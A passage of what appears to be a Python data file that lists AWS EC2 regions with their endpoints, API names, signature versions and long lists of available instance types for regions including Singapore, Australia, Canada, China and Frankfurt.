"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6a.12xlarge",
"m6a.16xlarge",
"m6a.24xlarge",
"m6a.2xlarge",
"m6a.32xlarge",
"m6a.48xlarge",
"m6a.4xlarge",
"m6a.8xlarge",
"m6a.large",
"m6a.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"ap-southeast-1": {
"api_name": "ec2_ap_southeast",
"country": "Singapore",
"endpoint": "ec2.ap-southeast-1.amazonaws.com",
"id": "ap-southeast-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-12tb1.112xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"u-9tb1.112xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"ap-southeast-2": {
"api_name": "ec2_ap_southeast_2",
"country": "Australia",
"endpoint": "ec2.ap-southeast-2.amazonaws.com",
"id": "ap-southeast-2",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5ad.12xlarge",
"c5ad.16xlarge",
"c5ad.24xlarge",
"c5ad.2xlarge",
"c5ad.4xlarge",
"c5ad.8xlarge",
"c5ad.large",
"c5ad.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"f1.16xlarge",
"f1.2xlarge",
"f1.4xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"ca-central-1": {
"api_name": "ec2_ca_central_1",
"country": "Canada",
"endpoint": "ec2.ca-central-1.amazonaws.com",
"id": "ca-central-1",
"instance_types": [
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
],
"signature_version": "4",
},
"cn-north-1": {
"api_name": "ec2_cn_north",
"country": "China",
"endpoint": "ec2.cn-north-1.amazonaws.com.cn",
"id": "cn-north-1",
"instance_types": [],
"signature_version": "4",
},
"cn-northwest-1": {
"api_name": "ec2_cn_northwest",
"country": "China",
"endpoint": "ec2.cn-northwest-1.amazonaws.com.cn",
"id": "cn-northwest-1",
"instance_types": [],
"signature_version": "4",
},
"eu-central-1": {
"api_name": "ec2_eu_central",
"country": "Frankfurt",
"endpoint": "ec2.eu-central-1.amazonaws.com",
"id": "eu-central-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
